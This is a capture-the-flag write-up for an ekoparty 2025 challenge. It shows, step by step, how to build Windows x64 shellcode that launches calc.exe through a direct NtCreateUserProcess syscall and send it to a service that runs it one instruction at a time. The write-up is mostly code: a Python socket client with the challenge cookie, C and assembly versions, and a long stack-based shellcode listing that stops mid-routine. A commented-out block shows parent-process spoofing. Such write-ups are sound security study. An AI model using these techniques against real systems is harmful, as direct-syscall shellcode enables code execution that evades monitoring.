Syscall_Shellcode(x64)
Oct 22, 2025
47 minutes
Shellcode V2.0
Entrance
Hold on! another shellcode blog?
I ensure you are gonna like it :))
This is actually WriteUp of ekoparty2025_challenge. Binary Gecko announced it 2 weeks ago -> Link
Intro
Let’s getting know each others with the program.
Expected solutions are pretty reasonable. Execute a calc.exe or notepad.exe to prove you can execute anything from remotely. Use python and it should be work on Win 10 or Win 11.
Here is informations->
First info:
According to explanation of challenge “it will execute single line of instructions for testing purposes”.
So it means, if we create a shellcode and send all of the instructions line by line it will execute 🤩
Ehhh maybe. It may cause a problem because of jump instructions. For example if your any of jmp is taken and that jump to forward, there is no instruction yet. However there is a second information which is getting this question is meaningless.
Second info:
Get ready because this part is really brutal. “Program are always execute instructions at the SAME address”.
It basically means when you hit “jump into” while debugging your shellcode, it should be never get into it. When you execute “call” instructions(for example WINAPI) these are changing RIP. But program is going to set RIP again and again for every single instruction’s execution. We can’t use any call, ret and jump instructions. On the other hand we should call something to provide expected solution :/
Come closer, I have an idea but I’m not sure you are gonna like it.
Think an instruction which is a call but not on the userland. Of course you know what is it, maybe I should change the title 😅
SYSCALL is executed for only one line on the userland but if you set a breakpoint to corresponding NATIVE API call on the kernel yes, you can get into it. Nevermind, we are not going to debug the kernel, I did while doing it because this is new for me so I just tried to find my way but it is not necessary.
First Touch
They didn’t hide it. So I created a python code to communicate with that socket.(I confess, I used AI :/)
HOST = "127.0.0.1"
PORT = 20259 # 0x4f23H
def send_seq_same_socket(payloads, timeout=5):
s = socket.socket()
s.settimeout(timeout)
s.connect((HOST, PORT))
s.sendall(COOKIE)
# consume greeting(s)
try: s.recv(4096)
except: pass
try: s.recv(4096)
except: pass
for payload in payloads:
s.sendall(struct.pack('<I', len(payload)))
s.sendall(payload)
# read server response (best-effort)
try:
resp = s.recv(4096)
print("<<<", resp.decode(errors='replace'))
except Exception as e:
print("recv err", e)
time.sleep(0.05)
s.close()
This is pretty enough.
I guess we have to find cookie.
Here is the cookie.
COOKIE = b"Ekoparty 2025 - Binary Gecko challenge\x00"
Now send a couple of instructions and see the results.
As we talked about it always executed at the same address. After this we need a proper instructions opcode. Time to create shellcode.
Now we will move from nowadays to ancient times.
Civilization
We will create a program like the ones written by people in the civilized era :)
It because to see a working example via NativeAPI. When we use API, these are calling Native APIs and then syscalls executed.
There may more wrapper or something else but this explain what we should know.
I found a code from github which is already doing it. Github Link
I just changed a little thing like cmd to calc and I removed sixth attribute. Here is rearranged code with values.
#include <cstdio>
#include <Windows.h>
#include "imports.h"
int main()
{
// Path to the image file from which the process will be created
UNICODE_STRING NtImagePath, Params, ImagePath;
RtlInitUnicodeString(&ImagePath, (PWSTR)L"C:\\Windows\\System32\\calc.exe");
RtlInitUnicodeString(&NtImagePath, (PWSTR)L"\\??\\C:\\Windows\\System32\\calc.exe");
//RtlInitUnicodeString(&Params, (PWSTR)L"\"C:\\WINDOWS\\SYSTEM32\\cmd.exe\" /k echo Hello world!");
//Create the process parameters
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;
RtlCreateProcessParametersEx(&ProcessParameters, &ImagePath, NULL, NULL, &Params, NULL, NULL, NULL, NULL, NULL, RTL_USER_PROCESS_PARAMETERS_NORMALIZED);
// Initialize the PS_CREATE_INFO structure
PS_CREATE_INFO CreateInfo = { 0 };
CreateInfo.Size = sizeof(CreateInfo); // 88
CreateInfo.State = PsCreateInitialState;
//Skip Image File Execution Options debugger
CreateInfo.InitState.u1.InitFlags = PsSkipIFEODebugger;
OBJECT_ATTRIBUTES objAttr = { sizeof(OBJECT_ATTRIBUTES) };
PPS_STD_HANDLE_INFO stdHandleInfo = (PPS_STD_HANDLE_INFO)RtlAllocateHeap(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(PS_STD_HANDLE_INFO));
PCLIENT_ID clientId = (PCLIENT_ID)RtlAllocateHeap(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(PS_ATTRIBUTE));
PSECTION_IMAGE_INFORMATION SecImgInfo = (PSECTION_IMAGE_INFORMATION)RtlAllocateHeap(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(SECTION_IMAGE_INFORMATION));
PPS_ATTRIBUTE_LIST AttributeList = (PS_ATTRIBUTE_LIST*)RtlAllocateHeap(RtlProcessHeap(), HEAP_ZERO_MEMORY, sizeof(PS_ATTRIBUTE_LIST));
// Create necessary attributes
AttributeList->TotalLength = sizeof(PS_ATTRIBUTE_LIST) - sizeof(PS_ATTRIBUTE);
AttributeList->Attributes[0].Attribute = PS_ATTRIBUTE_CLIENT_ID; // 0x10003
AttributeList->Attributes[0].Size = sizeof(CLIENT_ID); //0x10
AttributeList->Attributes[0].ValuePtr = clientId;
AttributeList->Attributes[1].Attribute = PS_ATTRIBUTE_IMAGE_INFO; // 0x6
AttributeList->Attributes[1].Size = sizeof(SECTION_IMAGE_INFORMATION); // 0x40
AttributeList->Attributes[1].ValuePtr = SecImgInfo;
AttributeList->Attributes[2].Attribute = PS_ATTRIBUTE_IMAGE_NAME; // 0x20005
AttributeList->Attributes[2].Size = NtImagePath.Length; // 0x40
AttributeList->Attributes[2].ValuePtr = NtImagePath.Buffer; // windows/system32/calc.exe
AttributeList->Attributes[3].Attribute = PS_ATTRIBUTE_STD_HANDLE_INFO; // 0x2000A
AttributeList->Attributes[3].Size = sizeof(PS_STD_HANDLE_INFO); // 8
AttributeList->Attributes[3].ValuePtr = stdHandleInfo;
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON; // 0x100000000000
// Add process mitigation attribute
AttributeList->Attributes[4].Attribute = PS_ATTRIBUTE_MITIGATION_OPTIONS; // // 0x20010
AttributeList->Attributes[4].Size = sizeof(DWORD64); // 8
AttributeList->Attributes[4].ValuePtr = &policy;
//// Spoof Parent Process Id as explorer.exe
//DWORD trayPID;
//HWND trayWnd = FindWindowW(L"Shell_TrayWnd", NULL);
//GetWindowThreadProcessId(trayWnd, &trayPID);
//HANDLE hParent = OpenProcess(PROCESS_ALL_ACCESS, false, trayPID);
//if (hParent)
//{
// AttributeList->Attributes[5].Attribute = PS_ATTRIBUTE_PARENT_PROCESS; // 0x60000
// AttributeList->Attributes[5].Size = sizeof(HANDLE); // 0x8
// AttributeList->Attributes[5].ValuePtr = hParent;
//}
//else
//{
// AttributeList->TotalLength -= sizeof(PS_ATTRIBUTE);
//}
// Create the process
HANDLE hProcess = NULL, hThread = NULL;
NtCreateUserProcess(&hProcess, &hThread, MAXIMUM_ALLOWED, MAXIMUM_ALLOWED, &objAttr, &objAttr, 0, 0, ProcessParameters, &CreateInfo, AttributeList);
// Clean up
//if (hParent) CloseHandle(hParent);
RtlFreeHeap(RtlProcessHeap(), 0, AttributeList);
RtlFreeHeap(RtlProcessHeap(), 0, stdHandleInfo);
RtlFreeHeap(RtlProcessHeap(), 0, clientId);
RtlFreeHeap(RtlProcessHeap(), 0, SecImgInfo);
RtlDestroyProcessParameters(ProcessParameters);
}
This is why I used this Native API because I can easily convert it to syscall. But first lets write an ASM code.
Stone Age
We will get a spark by striking the flint.
; Full_CreateUserProc_fixed_offsets_v2.asm
; ML64, attribute-rich, corrected offsets, fixed GetModuleHandleA call
EXTERN GetModuleHandleA:PROC
EXTERN GetProcAddress:PROC
EXTERN MultiByteToWideChar:PROC
EXTERN RtlInitUnicodeString:PROC
EXTERN RtlCreateProcessParametersEx:PROC
EXTERN NtCreateUserProcess:PROC
EXTERN GetProcessHeap:PROC
EXTERN RtlAllocateHeap:PROC
PS_ATTRIBUTE_CLIENT_ID EQU 010003h
PS_ATTRIBUTE_IMAGE_INFO EQU 000006h
PS_ATTRIBUTE_IMAGE_NAME EQU 020005h
PS_ATTRIBUTE_STD_HANDLE_INFO EQU 02000Ah
PS_ATTRIBUTE_MITIGATION_OPTIONS EQU 020010h
OBJECT_ATTRIBUTES_SIZE EQU 30h
PS_CREATE_INFO_SIZE EQU 058h
MAXIMUM_ALLOWED EQU 02000000h
PS_ATTR_ENTRY_SIZE EQU 020h
PS_ATTR_HEADER_SIZE EQU 8
.DATA
szNtdll db 'ntdll.dll',0
szNtFunc db 'NtCreateUserProcess',0
szImageUserA db 'C:\Windows\System32\calc.exe',0
szImageNtA db '\??\C:\Windows\System32\calc.exe',0
wImageUser dw 256 dup(0)
wImageNt dw 256 dup(0)
usImageUser dq 0,0,0
usImageNt dq 0,0,0
usParams dq 0,0,0
ALIGN 8
OACommon dq 0,0,0,0,0,0
CreateInfo dq 0,0,0,0,0,0,0,0,0,0
ClientId dq 0,0
SecImgInfo dq 0,0,0,0,0,0,0,0,0,0
StdHandles dq 0,0
Policy dq 0100000000000h
ALIGN 8
hProcess dq 0
hThread dq 0
pProcParams dq 0
pAttrList dq 0
.CODE
PUBLIC main
main PROC
sub rsp, 0A8h
xor rax, rax
; --- resolve NtCreateUserProcess safely ---
sub rsp, 32
lea rcx, szNtdll
call GetModuleHandleA
add rsp, 32
mov rcx, rax
sub rsp, 32
lea rdx, szNtFunc
call GetProcAddress
add rsp, 32
mov r12, rax
; --- ANSI -> UTF16 conversion ---
xor ecx, ecx
xor edx, edx
lea r8, szImageUserA
mov r9d, -1
lea rax, wImageUser
mov qword ptr [rsp+20h], rax
mov dword ptr [rsp+28h], 256
call MultiByteToWideChar
xor ecx, ecx
xor edx, edx
lea r8, szImageNtA
mov r9d, -1
lea rax, wImageNt
mov qword ptr [rsp+20h], rax
mov dword ptr [rsp+28h], 256
call MultiByteToWideChar
; --- init UNICODE_STRINGs ---
lea rcx, usImageUser
lea rdx, wImageUser
call RtlInitUnicodeString
lea rcx, usImageNt
lea rdx, wImageNt
call RtlInitUnicodeString
lea rcx, usParams
xor rdx, rdx
call RtlInitUnicodeString
; --- create ProcessParameters ---
lea rcx, pProcParams
lea rdx, usImageUser
xor r8, r8
xor r9, r9
lea rax, usParams
mov qword ptr [rsp+20h], rax
mov qword ptr [rsp+28h], 0
mov qword ptr [rsp+30h], 0
mov qword ptr [rsp+38h], 0
mov qword ptr [rsp+40h], 0
mov qword ptr [rsp+48h], 0
mov dword ptr [rsp+50h], 1
;mov rax, OFFSET RtlCreateProcessParametersEx
call RtlCreateProcessParametersEx
mov r15, qword ptr [pProcParams]
; --- OBJECT_ATTRIBUTES ---
mov dword ptr [OACommon], OBJECT_ATTRIBUTES_SIZE
; --- PS_CREATE_INFO ---
mov qword ptr [CreateInfo+0], PS_CREATE_INFO_SIZE
mov byte ptr [CreateInfo+10h], 1
; --- allocate PS_ATTRIBUTE_LIST ---
call GetProcessHeap
mov rcx, rax
mov rdx, 8
mov r8, PS_ATTR_HEADER_SIZE + 5*PS_ATTR_ENTRY_SIZE
call RtlAllocateHeap
mov qword ptr [pAttrList], rax
mov rbx, rax
; Header total length
mov rax, 168
mov qword ptr [rbx+0], rax
; --- Attr 0: CLIENT_ID ---
mov qword ptr [rbx+8], PS_ATTRIBUTE_CLIENT_ID
mov qword ptr [rbx+16], 10h
lea rax, ClientId
mov qword ptr [rbx+24], rax
mov qword ptr [rbx+32], 0
; --- Attr 1: IMAGE_INFO ---
mov qword ptr [rbx+40], PS_ATTRIBUTE_IMAGE_INFO
mov qword ptr [rbx+48], 40h
lea rax, SecImgInfo
mov qword ptr [rbx+56], rax
mov qword ptr [rbx+64], 0
; --- Attr 2: IMAGE_NAME ---
mov qword ptr [rbx+72], PS_ATTRIBUTE_IMAGE_NAME
movzx rax, word ptr [usImageNt]
mov qword ptr [rbx+80], rax
mov rax, qword ptr [usImageNt+8]
mov qword ptr [rbx+88], rax
mov qword ptr [rbx+96], 0
; --- Attr 3: STD_HANDLE_INFO ---
mov qword ptr [rbx+104], PS_ATTRIBUTE_STD_HANDLE_INFO
mov qword ptr [rbx+112], 8
lea rax, StdHandles
mov qword ptr [rbx+120], rax
mov qword ptr [rbx+128], 0
; --- Attr 4: MITIGATION_OPTIONS ---
mov qword ptr [rbx+136], PS_ATTRIBUTE_MITIGATION_OPTIONS
mov qword ptr [rbx+144], 8
lea rax, Policy
mov qword ptr [rbx+152], rax
mov qword ptr [rbx+160], 0
; --- call NtCreateUserProcess ---
lea rcx, hProcess
lea rdx, hThread
mov r8d, MAXIMUM_ALLOWED
mov r9d, MAXIMUM_ALLOWED
lea rax, OACommon
mov qword ptr [rsp+20h], rax
lea rax, OACommon
mov qword ptr [rsp+28h], rax
mov dword ptr [rsp+30h], 0
mov dword ptr [rsp+38h], 0
mov rax, r15
mov qword ptr [rsp+40h], r15
lea rax, CreateInfo
mov qword ptr [rsp+48h], rax
mov rax, qword ptr [pAttrList]
mov qword ptr [rsp+50h], rax
mov rax, r12
call rax
main ENDP
END
Yeah, it took so much time from me to reproduce ASM code from C++ but this example is executing calc.exe.
Here is compiler parameters.
@echo off
REM Visual Studio ortam değişkenlerini yükle
call "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
REM Derleme
ml64 /c asm.asm
IF ERRORLEVEL 1 (
echo [!] Derleme hatası oluştu.
goto :end
)
REM Linkleme
link asm.obj /subsystem:console /entry:main kernel32.lib ntdll.lib user32.lib
IF ERRORLEVEL 1 (
echo [!] Linkleme hatası oluştu.
goto :end
)
echo [✓] Derleme ve linkleme tamamlandı. asm.exe oluşturuldu.
:end
pause
As it is, it still belong to a bit modern age. There is data section, call functions and libraries. I want it to go back further.
Primal Era
syscall
mov r10, rcx
mov eax, 0d1h
push r14
syscall
pop r14
Instead of last call we will use this. Now we don’t need GetModuleHandleA:PROC, GetProcAddress:PROC and NtCreateUserProcess:PROC.
unicode string
call MultiByteToWideChar this is just reassign bytes to other variable with adding a “\x00” bytes for every bytes. So we can manually initialize the bytes with adding “\x00”. This is okay.
call RtlInitUnicodeString initialize the string and it just filling to struct below.
typedef struct _UNICODE_STRING
{
USHORT Length; // 4 bytes
USHORT MaximumLength; // 4 bytes
PWSTR Buffer; // 8 bytes
} UNICODE_STRING, * PUNICODE_STRING;
Yeah we can also make it manually for every strings.
memory allocate
call GetProcessHeap and call RtlAllocateHeap can we just “sub rsp”? This is what I mean as primal :))
RtlCreateProcessParametersEx
I especially left it to the end because this is a bit longer.
.
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;
RtlCreateProcessParametersEx(&ProcessParameters, &ImagePath, NULL, NULL, &Params, NULL, NULL, NULL, NULL, NULL, RTL_USER_PROCESS_PARAMETERS_NORMALIZED);
.
.
.
NtCreateUserProcess(&hProcess, &hThread, MAXIMUM_ALLOWED, MAXIMUM_ALLOWED, &objAttr, &objAttr, 0, 0, ProcessParameters, &CreateInfo, AttributeList);
There is nothing we care about anything except ProcessParameters in RtlCreateProcessParametersEx.
#define RTL_MAX_DRIVE_LETTERS 32
typedef struct _RTL_USER_PROCESS_PARAMETERS
{
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
HANDLE ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StandardInput;
HANDLE StandardOutput;
HANDLE StandardError;
CURDIR CurrentDirectory;
UNICODE_STRING DllPath;
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
PWCHAR Environment;
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle;
UNICODE_STRING DesktopInfo;
UNICODE_STRING ShellInfo;
UNICODE_STRING RuntimeData;
RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
ULONG_PTR EnvironmentSize;
ULONG_PTR EnvironmentVersion;
PVOID PackageDependencyData;
ULONG ProcessGroupId;
ULONG LoaderThreads;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
So much pointers and some of them are really not related with what given parameters from user. For example environment variables are filled automatically.
1040 bytes but some values can be deleted because not necessary. So I check for everything, here is what we need:
Current Directory Pointer -> It can be filled as “C:”
ImagePathName -> This is already defined, we are not going to change it.
CommandLine -> It actually point to current memory base address. But when I changed as point to structure’s beginnig there was no problem.
Environment -> It scared me at the first look… Because whole environment length is more than 3000 bytes in my machine. I found a shortcut. OnlySystemRoot=C:\Windowsis fine.
.Data Section
We got so much allocated memory because of structures and variables. Now the time to allocate all of them on the stack.
I created a table to better allocation.
| Label | Member (qword) | Size (byte) | Offset (hex) | Reason |
|---|---|---|---|---|
| lastParams | 4 | 0x20 | 0x0000 | RtlCreateProcessParametersEx last parameters |
| envBuffer | 100 | 0x320 | 0x0020 | Environment Block |
| wImageUser | 128 | 0x400 | 0x0340 | (C:\Windows\System32\calc.exe) |
| wImageNt | 128 | 0x400 | 0x0740 | NT path (??\C:\Windows\System32\calc.exe) |
| wCurDir | 128 | 0x400 | 0x0B40 | CurrentDirectory |
| cmdlineParam | 4 | 0x20 | 0x0F40 | |
| usImageUser | 12 | 0x60 | 0x0F60 | UNICODE_STRING (Calc User) |
| usImageNt | 12 | 0x60 | 0x0FC0 | UNICODE_STRING (Calc NT) |
| OACommon | 6 | 0x30 | 0x1020 | OBJECT_ATTRIBUTES Common |
| CreateInfo | 10 | 0x50 | 0x1050 | PS_CREATE_INFO struct |
| ClientId | 2 | 0x10 | 0x10A0 | CLIENT_ID |
| SecImgInfo | 10 | 0x50 | 0x10B0 | PS_CREATE_INITIAL_STATE (Security Image Info) |
| StdHandles | 2 | 0x10 | 0x1100 | Standart I/O handle |
| Policy | 2 | 0x10 | 0x1110 | Mitigation Policy Block (Attr 4) |
| hProcess | 1 | 0x8 | 0x1120 | Process handle |
| hThread | 1 | 0x8 | 0x1128 | Thread handle |
| pProcParams | 1 | 0x8 | 0x1130 | PRTL_USER_PROCESS_PARAMETERS |
| pAttrList | 1 | 0x8 | 0x1138 | PS_ATTRIBUTE_LIST pointer |
| TOTAL | — | 0x1140 | — | Total size allocated at the stack |
For _RTL_USER_PROCESS_PARAMETERS I used another block of memory. We are responsible from every variables’s memory, any mistakes caused to overwrite them. Also we got so much memory to execute a little program :) If you wish you can allocate different memory blocks for variables.
I introduce you to absolute shellcode !!
CODE
.CODE
PUBLIC main
main PROC
sub rsp, 08h
sub rsp, 01140h
; --- wImageNt buffer başlangıcı ---
;mov rbx, OFFSET wImageNt
lea rbx,[rsp+0740h]
; \??\C:\Windows\System32\calc.exe → UTF-16 manuel
mov byte ptr [rbx+0], '\'
mov byte ptr [rbx+1], 0
mov byte ptr [rbx+2], '?'
mov byte ptr [rbx+3], 0
mov byte ptr [rbx+4], '?'
mov byte ptr [rbx+5], 0
mov byte ptr [rbx+6], '\'
mov byte ptr [rbx+7], 0
mov byte ptr [rbx+8], 'C'
mov byte ptr [rbx+9], 0
mov byte ptr [rbx+10], ':'
mov byte ptr [rbx+11], 0
mov byte ptr [rbx+12], '\'
mov byte ptr [rbx+13], 0
mov byte ptr [rbx+14], 'W'
mov byte ptr [rbx+15], 0
mov byte ptr [rbx+16], 'i'
mov byte ptr [rbx+17], 0
mov byte ptr [rbx+18], 'n'
mov byte ptr [rbx+19], 0
mov byte ptr [rbx+20], 'd'
mov byte ptr [rbx+21], 0
mov byte ptr [rbx+22], 'o'
mov byte ptr [rbx+23], 0
mov byte ptr [rbx+24], 'w'
mov byte ptr [rbx+25], 0
mov byte ptr [rbx+26], 's'
mov byte ptr [rbx+27], 0
mov byte ptr [rbx+28], '\'
mov byte ptr [rbx+29], 0
mov byte ptr [rbx+30], 'S'
mov byte ptr [rbx+31], 0
mov byte ptr [rbx+32], 'y'
mov byte ptr [rbx+33], 0
mov byte ptr [rbx+34], 's'
mov byte ptr [rbx+35], 0
mov byte ptr [rbx+36], 't'
mov byte ptr [rbx+37], 0
mov byte ptr [rbx+38], 'e'
mov byte ptr [rbx+39], 0
mov byte ptr [rbx+40], 'm'
mov byte ptr [rbx+41], 0
mov byte ptr [rbx+42], '3'
mov byte ptr [rbx+43], 0
mov byte ptr [rbx+44], '2'
mov byte ptr [rbx+45], 0
mov byte ptr [rbx+46], '\'
mov byte ptr [rbx+47], 0
mov byte ptr [rbx+48], 'c'
mov byte ptr [rbx+49], 0
mov byte ptr [rbx+50], 'a'
mov byte ptr [rbx+51], 0
mov byte ptr [rbx+52], 'l'
mov byte ptr [rbx+53], 0
mov byte ptr [rbx+54], 'c'
mov byte ptr [rbx+55], 0
mov byte ptr [rbx+56], '.'
mov byte ptr [rbx+57], 0
mov byte ptr [rbx+58], 'e'
mov byte ptr [rbx+59], 0
mov byte ptr [rbx+60], 'x'
mov byte ptr [rbx+61], 0
mov byte ptr [rbx+62], 'e'
mov byte ptr [rbx+63], 0
mov byte ptr [rbx+64], 0 ; null terminator
mov byte ptr [rbx+65], 0
; --- wImageUser → wImageNt+8 adresini ver ---
;mov rbx, OFFSET wImageUser
lea rbx,[rsp+0340h]
lea rax, [rsp+0748h]
mov qword ptr [rbx], rax
; --- init UNICODE_STRING: usImageUser ---
mov word ptr [rsp+0F60h], 038h ; Length = 0x38 (56 byte = 28 wchar)
mov word ptr [rsp+0F62h], 03Ah ; MaximumLength = 0x3A
lea rax, [rsp+0340h] ; &wImageUser (string buffer)
mov qword ptr [rsp+0F68h], rax ; Buffer = &wImageUser
; --- RtlInitUnicodeString(&usImageNt, L"\\??\\C:\\Windows\\System32\\calc.exe") eşdeğeri ---
mov word ptr [rsp+0FC0h], 040h ; Length = 34 * 2 = 0x44 (68)
mov word ptr [rsp+0FC0h+2], 042h ; MaximumLength = 0x46 (70)
lea rax, [rsp+0740h] ; rax = adresi al
mov qword ptr [rsp+0FC0h+8], rax ; Buffer = &wImageNt
; --- usParams ---
mov word ptr [rbx+32h], 0 ; Length = 0
mov word ptr [rbx+34h], 2 ; MaximumLength = 2 (null terminator)
mov qword ptr [rbx+32h+8], 0 ; Buffer = NULL
; --- create ProcessParameters ---
; stack üzerinde rsp+01130h için alan ayır
; stack üzerinde rsp+01130h için 0410 byte yer ayır
; --- CurrentDirectory conversion ---
; rcx, rdx, r8, r9 -> MultiByteToWideChar parametreleri
;mov rbx, OFFSET envBuffer
lea rbx, [rsp-01800h]
mov byte ptr [rbx+0], 'S'
mov byte ptr [rbx+1], 0
mov byte ptr [rbx+2], 'y'
mov byte ptr [rbx+3], 0
mov byte ptr [rbx+4], 's'
mov byte ptr [rbx+5], 0
mov byte ptr [rbx+6], 't'
mov byte ptr [rbx+7], 0
mov byte ptr [rbx+8], 'e'
mov byte ptr [rbx+9], 0
mov byte ptr [rbx+10], 'm'
mov byte ptr [rbx+11], 0
mov byte ptr [rbx+12], 'R'
mov byte ptr [rbx+13], 0
mov byte ptr [rbx+14], 'o'
mov byte ptr [rbx+15], 0
mov byte ptr [rbx+16], 'o'
mov byte ptr [rbx+17], 0
mov byte ptr [rbx+18], 't'
mov byte ptr [rbx+19], 0
mov byte ptr [rbx+20], '='
mov byte ptr [rbx+21], 0
mov byte ptr [rbx+22], 'C'
mov byte ptr [rbx+23], 0
mov byte ptr [rbx+24], ':'
mov byte ptr [rbx+25], 0
mov byte ptr [rbx+26], '\'
mov byte ptr [rbx+27], 0
mov byte ptr [rbx+28], 'W'
mov byte ptr [rbx+29], 0
mov byte ptr [rbx+30], 'i'
mov byte ptr [rbx+31], 0
mov byte ptr [rbx+32], 'n'
mov byte ptr [rbx+33], 0
mov byte ptr [rbx+34], 'd'
mov byte ptr [rbx+35], 0
mov byte ptr [rbx+36], 'o'
mov byte ptr [rbx+37], 0
mov byte ptr [rbx+38], 'w'
mov byte ptr [rbx+39], 0
mov byte ptr [rbx+40], 's'
mov byte ptr [rbx+41], 0
; Tek null terminator
mov byte ptr [rbx+42], 0
mov byte ptr [rbx+43], 0
; İkinci null terminator (environment block sonu)
mov byte ptr [rbx+44], 0
mov byte ptr [rbx+45], 0
; --- envBuffer version ---
lea rbx, [rsp+0B40h]
mov byte ptr [rbx+0], 'C'
mov byte ptr [rbx+1], 0
mov byte ptr [rbx+2], ':'
mov byte ptr [rbx+3], 0
mov byte ptr [rbx+4], '\'
mov byte ptr [rbx+5], 0
mov byte ptr [rbx+6], 0
mov byte ptr [rbx+7], 0
sub rsp, 02000h
lea rbx, [rsp]
mov qword ptr [rsp+02000h+01130h], rbx
; stack sıfırlama (0410 byte → 0410 / 8 = 82 qword)
mov dword ptr [rbx+000h], 06b0h
mov dword ptr [rbx+04h], 06b0h
mov qword ptr [rbx+008h], 1
mov qword ptr [rbx+010h], 0
mov qword ptr [rbx+018h], 0
mov qword ptr [rbx+020h], 0
mov qword ptr [rbx+028h], 0
mov qword ptr [rbx+030h], 0
mov qword ptr [rbx+038h], 0
lea rax, [rsp+02B40h]
mov qword ptr [rbx+040h], rax
mov qword ptr [rbx+048h], 0
mov qword ptr [rbx+050h], 0
mov qword ptr [rbx+058h], 0
mov qword ptr [rbx+060h], 03a0038h
lea rax, [rsp+02340h]
mov qword ptr [rsp+2000h], rax ; lastParams[0]
mov qword ptr [rsp+2008h], rax ; lastParams[1]
lea rax, [rsp+2000h] ; rax = &lastParams
mov qword ptr [rbx+068h], rax
mov qword ptr [rbx+070h], 0
lea rax, [rbx]
; cmdlineParam stack offset: 0x0080
lea rax, [rsp+02080h] ; rax = &cmdlineParam
mov qword ptr [rsp+02080h], rax ; cmdlineParam[0] = rax
mov qword ptr [rsp+02088h], rax ; cmdlineParam[1] = rax
lea rax, [rsp+02080h] ; rax = &cmdlineParam
mov qword ptr [rbx+078h], rax
lea rax, [rsp+0800h]
mov qword ptr [rbx+080h], rax
mov qword ptr [rbx+088h], 0
mov qword ptr [rbx+090h], 0
mov qword ptr [rbx+098h], 0
mov qword ptr [rbx+0A0h], 0
mov qword ptr [rbx+0A8h], 0
mov qword ptr [rbx+0B0h], 0
mov qword ptr [rbx+0B8h], 0
mov qword ptr [rbx+0C0h], 0
mov qword ptr [rbx+0C8h], 0
mov qword ptr [rbx+0D0h], 0
mov qword ptr [rbx+0D8h], 0
mov qword ptr [rbx+0E0h], 0
mov qword ptr [rbx+0E8h], 0
mov qword ptr [rbx+0F0h], 0
mov qword ptr [rbx+0F8h], 0
mov qword ptr [rbx+0100h], 0
mov qword ptr [rbx+0108h], 0
mov qword ptr [rbx+0110h], 0
mov qword ptr [rbx+0118h], 0
mov qword ptr [rbx+0120h], 0
mov qword ptr [rbx+0128h], 0
mov qword ptr [rbx+0130h], 0
mov qword ptr [rbx+0138h], 0
mov qword ptr [rbx+0140h], 0
mov qword ptr [rbx+0148h], 0
mov qword ptr [rbx+0150h], 0
mov qword ptr [rbx+0158h], 0
mov qword ptr [rbx+0160h], 0
mov qword ptr [rbx+0168h], 0
mov qword ptr [rbx+0170h], 0
mov qword ptr [rbx+0178h], 0
mov qword ptr [rbx+0180h], 0
mov qword ptr [rbx+0188h], 0
mov qword ptr [rbx+0190h], 0
mov qword ptr [rbx+0198h], 0
mov qword ptr [rbx+01A0h], 0
mov qword ptr [rbx+01A8h], 0
mov qword ptr [rbx+01B0h], 0
mov qword ptr [rbx+01B8h], 0
mov qword ptr [rbx+01C0h], 0
mov qword ptr [rbx+01C8h], 0
mov qword ptr [rbx+01D0h], 0
mov qword ptr [rbx+01D8h], 0
mov qword ptr [rbx+01E0h], 0
mov qword ptr [rbx+01E8h], 0
mov qword ptr [rbx+01F0h], 0
mov qword ptr [rbx+01F8h], 0
mov qword ptr [rbx+0200h], 0
mov qword ptr [rbx+0208h], 0
mov qword ptr [rbx+0210h], 0
mov qword ptr [rbx+0218h], 0
mov qword ptr [rbx+0220h], 0
mov qword ptr [rbx+0228h], 0
mov qword ptr [rbx+0230h], 0
mov qword ptr [rbx+0238h], 0
mov qword ptr [rbx+0240h], 0
mov qword ptr [rbx+0248h], 0
mov qword ptr [rbx+0250h], 0
mov qword ptr [rbx+0258h], 0
mov qword ptr [rbx+0260h], 0
mov qword ptr [rbx+0268h], 0
mov qword ptr [rbx+0270h], 0
mov qword ptr [rbx+0278h], 0
mov qword ptr [rbx+0280h], 0
mov qword ptr [rbx+0288h], 0
mov qword ptr [rbx+0290h], 0
mov qword ptr [rbx+0298h], 0
mov qword ptr [rbx+02A0h], 0
mov qword ptr [rbx+02A8h], 0
mov qword ptr [rbx+02B0h], 0
mov qword ptr [rbx+02B8h], 0
mov qword ptr [rbx+02C0h], 0
mov qword ptr [rbx+02C8h], 0
mov qword ptr [rbx+02D0h], 0
mov qword ptr [rbx+02D8h], 0
mov qword ptr [rbx+02E0h], 0
mov qword ptr [rbx+02E8h], 0
mov qword ptr [rbx+02F0h], 0
mov qword ptr [rbx+02F8h], 0
mov qword ptr [rbx+0300h], 0
mov qword ptr [rbx+0308h], 0
mov qword ptr [rbx+0310h], 0
mov qword ptr [rbx+0318h], 0
mov qword ptr [rbx+0320h], 0
mov qword ptr [rbx+0328h], 0
mov qword ptr [rbx+0330h], 0
mov qword ptr [rbx+0338h], 0
mov qword ptr [rbx+0340h], 0
mov qword ptr [rbx+0348h], 0
mov qword ptr [rbx+0350h], 0
mov qword ptr [rbx+0358h], 0
mov qword ptr [rbx+0360h], 0
mov qword ptr [rbx+0368h], 0
mov qword ptr [rbx+0370h], 0
mov qword ptr [rbx+0378h], 0
mov qword ptr [rbx+0380h], 0
mov qword ptr [rbx+0388h], 0
mov qword ptr [rbx+0390h], 0
mov qword ptr [rbx+0398h], 0
mov qword ptr [rbx+03A0h], 0
mov qword ptr [rbx+03A8h], 0
mov qword ptr [rbx+03B0h], 0
mov qword ptr [rbx+03B8h], 0
mov qword ptr [rbx+03C0h], 0
mov qword ptr [rbx+03C8h], 0
mov qword ptr [rbx+03D0h], 0
mov qword ptr [rbx+03D8h], 0
mov qword ptr [rbx+03E0h], 0
mov qword ptr [rbx+03E8h], 0
